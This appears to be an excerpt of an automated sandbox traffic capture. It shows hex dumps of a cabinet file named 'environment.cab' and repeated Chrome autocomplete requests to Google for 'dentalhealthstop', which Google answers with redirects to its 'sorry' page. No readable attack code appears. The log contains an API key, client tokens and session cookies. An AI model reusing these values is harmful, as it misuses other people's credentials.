                                                                                                                                      2024-04-24 10:13:13 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92
                                                                                                                                      Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
                                                                                                                                      2024-04-24 10:13:13 UTC9633INData Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a
                                                                                                                                      Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      28192.168.2.1649743142.250.141.1064437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:13 UTC661OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=dentalhealthst&oit=1&cp=14&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                      Host: www.google.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      29192.168.2.1649745142.250.141.1064437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:13 UTC663OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=dentalhealthstop&oit=1&cp=16&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                      Host: www.google.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:13:14 UTC2233INHTTP/1.1 302 Found
                                                                                                                                      Location: https://www.google.com/sorry/index?continue=https://www.google.com/complete/search%3Fclient%3Dchrome-omni%26gs_ri%3Dchrome-ext-ansg%26xssi%3Dt%26q%3Ddentalhealthstop%26oit%3D1%26cp%3D16%26pgcl%3D4%26gs_rn%3D42%26psi%3D8AFy-_Mu70iYE25H%26sugkey%3DAIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw&q=EgSaEGkkGLm2o7EGIjDdeIXkDkr1W7MIzfg46MVbhiDIQSvJ1vzKr805RbfXbDnwI-AyyKzOgsHWRDgEy6YyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                                                                      x-hallmonitor-challenge: CgsIurajsQYQ9JLIZhIEmhBpJA
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-2sRhdcZ8AZrOS5JTM_QatA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                      Permissions-Policy: unload=()
                                                                                                                                      Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                                                                      Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                      Date: Wed, 24 Apr 2024 10:13:14 GMT
                                                                                                                                      Server: gws
                                                                                                                                      Content-Length: 616
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      Set-Cookie: 1P_JAR=2024-04-24-10; expires=Fri, 24-May-2024 10:13:14 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                                                                                                      Set-Cookie: NID=513=gv-Ws6fLJHFY0j2CPtpZYunoQ_MND1ckGm427y8CxyLH1nOBEJNoeCMc8BUsZJoUyyI4u5EO-POs00t0oCD4DL-SmvS18NoIdcSz6bLpmjoxeGaqcZsRX6EUdIWxYXw1uYQVa0L7FgnxGYdLuz98CI0alryY-FAxjDFg3f1Qut8; expires=Thu, 24-Oct-2024 10:13:13 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close
                                                                                                                                      2024-04-24 10:13:14 UTC616INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 63 6f 6d 70 6c 65 74 65 2f 73 65 61 72 63 68 25 33 46 63 6c
                                                                                                                                      Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/complete/search%3Fcl


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      30192.168.2.1649746142.250.141.1064437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:14 UTC877OUTGET /sorry/index?continue=https://www.google.com/complete/search%3Fclient%3Dchrome-omni%26gs_ri%3Dchrome-ext-ansg%26xssi%3Dt%26q%3Ddentalhealthstop%26oit%3D1%26cp%3D16%26pgcl%3D4%26gs_rn%3D42%26psi%3D8AFy-_Mu70iYE25H%26sugkey%3DAIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw&q=EgSaEGkkGLm2o7EGIjDdeIXkDkr1W7MIzfg46MVbhiDIQSvJ1vzKr805RbfXbDnwI-AyyKzOgsHWRDgEy6YyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                                                                                      Host: www.google.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      31192.168.2.1649747142.250.141.1064437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:14 UTC665OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=httdentalhealthstop&oit=1&cp=3&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                      Host: www.google.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      32192.168.2.1649748142.250.141.1064437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:14 UTC666OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=httpdentalhealthstop&oit=1&cp=4&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                      Host: www.google.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      33192.168.2.1649749142.250.141.1064437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:15 UTC667OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=httpsdentalhealthstop&oit=1&cp=5&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                      Host: www.google.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      34192.168.2.1649750142.250.141.1064437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:15 UTC670OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=https%3Adentalhealthstop&oit=3&cp=6&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                      Host: www.google.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      35192.168.2.1649751142.250.141.1064437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:16 UTC673OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=https%3A%2Fdentalhealthstop&oit=3&cp=7&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                      Host: www.google.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      36192.168.2.1649752142.250.141.1064437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:16 UTC676OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=https%3A%2F%2Fdentalhealthstop&oit=3&cp=8&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                      Host: www.google.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      37192.168.2.1649753142.250.141.1064437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:19 UTC613OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                      Host: www.google.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      38192.168.2.1649754142.250.141.1064437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:22 UTC677OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=https%3A%2F%2Fdentalhealthstop&oit=3&cp=24&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                      Host: www.google.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:13:22 UTC2254INHTTP/1.1 302 Found
                                                                                                                                      Location: https://www.google.com/sorry/index?continue=https://www.google.com/complete/search%3Fclient%3Dchrome-omni%26gs_ri%3Dchrome-ext-ansg%26xssi%3Dt%26q%3Dhttps%253A%252F%252Fdentalhealthstop%26oit%3D3%26cp%3D24%26pgcl%3D4%26gs_rn%3D42%26psi%3D8AFy-_Mu70iYE25H%26sugkey%3DAIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw&q=EgSaEGkkGMK2o7EGIjBW7tiPczaMKIC-1T-QDF0YnjGdNVZChmoM9yoJlSFHJkIvNzKw2bOl4QcuOIemxe0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                                                                      x-hallmonitor-challenge: CgwIwrajsQYQ87TZ1wISBJoQaSQ
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-3wVuaadd6F-_Vkx-t1NW5A' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                      Permissions-Policy: unload=()
                                                                                                                                      Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                                                                      Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                      Date: Wed, 24 Apr 2024 10:13:22 GMT
                                                                                                                                      Server: gws
                                                                                                                                      Content-Length: 636
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      Set-Cookie: 1P_JAR=2024-04-24-10; expires=Fri, 24-May-2024 10:13:22 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                                                                                                      Set-Cookie: NID=513=Qw6rO4GhRXIcAtSJm3aW6wrMR1K1tRaJnPcUjfKAags5kWh9RwZkQVvVHe3u8lJzu1tRZ03UCiQYAFIEauytsKVF-tWa_Iyu2veXCzV3lcfdaWulgFSUhxImGItphB9umLjqUUG3XvBCFugAJFTpR2fdXRygSOq5EErhTEesQcI; expires=Thu, 24-Oct-2024 10:13:22 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close
                                                                                                                                      2024-04-24 10:13:22 UTC636INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 63 6f 6d 70 6c 65 74 65 2f 73 65 61 72 63 68 25 33 46 63 6c
                                                                                                                                      Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/complete/search%3Fcl


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      39192.168.2.1649755142.250.141.1064437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:23 UTC678OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=https%3A%2F%2Fdentalhealthstop.&oit=3&cp=25&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                      Host: www.google.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
